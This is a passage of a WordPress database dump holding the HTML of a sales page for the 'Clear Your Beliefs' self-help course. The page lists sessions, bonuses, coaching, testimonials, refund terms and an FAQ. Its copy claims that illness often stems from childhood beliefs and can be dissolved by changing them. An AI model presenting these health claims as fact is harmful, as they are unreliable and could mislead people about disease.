influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1864, 2156, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71178:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and 